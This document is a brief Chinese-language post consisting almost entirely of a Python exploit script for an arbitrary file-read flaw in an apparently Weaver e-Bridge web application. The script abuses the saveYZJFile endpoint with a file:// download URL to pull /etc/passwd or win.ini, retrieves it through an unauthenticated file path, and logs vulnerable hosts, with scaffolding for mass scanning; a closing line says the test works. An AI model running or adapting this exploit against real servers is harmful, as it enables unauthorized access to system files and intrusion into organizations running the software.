1.代码如下:
import requests
import json
from multiprocessing import Pool, Manager
def two(host,id,dirstr):
s=requests.get(url=host+'/file/fileNoLogin/'+id,verify=False, timeout=5)
if ('/bin/bash' in s.text and 'root' in s.text) or 'bit' in s.text:
print(s.text)
save=open('e-Bridge.txt','a+')
save.write(host+' '+dirstr+'\n')
save.close()
def one(h,p):
dirstr=('/etc/passwd','/C:\Windows\win.ini')
for i in dirstr:
host = h +':' + p
try:
if p=='':
host = h +':80'
s=requests.get(url='http://'+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)
data = json.loads(s.text)
print('http://'+host,data['id'])
two('http://'+host,data['id'],i)
except:
pass
try:
if p=='':
host = h +':443'
s1=requests.get(url='https://'+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)
data = json.loads(s1.text)
print('https://'+host,data['id'])
two('https://'+host,data['id'],i)
except:
pass
if __name__ == '__main__':
one('xxxx.xxx.com','80')
2.测试结果完好